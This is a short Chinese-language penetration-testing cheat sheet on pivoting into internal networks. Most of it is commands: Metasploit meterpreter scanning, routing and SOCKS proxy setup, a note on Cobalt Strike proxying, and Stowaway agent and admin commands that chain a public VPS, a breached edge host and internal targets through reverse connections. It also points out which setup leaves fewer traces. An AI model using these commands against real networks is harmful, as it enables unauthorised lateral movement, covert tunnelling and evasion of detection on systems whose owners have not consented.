msf代理
meterpreter中
| 命令 | 说明 |
|---|---|
| run arp_scanner -r 10.10.10.0/24 | arp扫描 不会被防火墙拦截 |
| execute -f fscan.exe -a ‘-h 102.168.1.0/24’ -m portscan | 后台执行 |
| route add 10.10.10.1/24 1 普通权限也可做路由 或run autoroute -s 10.10.10.1/24 | 路由转发 (末尾数字为session) |
| route del 10.10.10.1/24 1 | 删除路由,同增加 |
| auxiliary/server/socks_proxyp中 set srvhost 本机ip | 设置本地端口监听, 代理软件配置本地ip+代理端口即可访问内网 |
| run autoroute -s 192.168.10.0/24 | 同route add |
| use auxiliary/server/socks_proxy | 配置边界代理 |
cs代理
socks4a的代理,所有流量均走开启的会话端口,延时高
一般配合stowaway使用
stowaway代理
| 说明 | 命令 |
|---|---|
| 公网vps 第一步启动,也可是边界机 |
stowaway_agent -l 5678 -s pass |
| 本机 第二步启动,ip为上一步的ip端口 |
stowaway_admin -c vps_ip:5678 -s pass stowaway_admin -l xxxx -s pass(被动模式,直接连接即可) 使用 backware 4444 4444 反向代理,出网 detail 查看节点 use 使用节点 socks 1080 配置socks代理(代理ip为admin的ip) 配置节点,用于下一个主机的反弹连接: use x listen 选1,然后配置ip端口 靶机连接该节点的ip端口即可上线 |
| 边界机 | stowaway_agent –reconnect 60 -c vps_ip:端口 -s pass –reconnect:掉线重连 |
| 内网 | 出网: stowaway_agent –reconnect 60 -c vps_ip:端口 -s pass 不出网: stowaway_agent -c 边界机内网ip:端口 -s pass |
也可以将vps作为admin,第一个agent放在边界靶机上,省略本机,但是容易留痕
–up(agent)/–down(admin)指定流量协议,上下游流量协议必须一致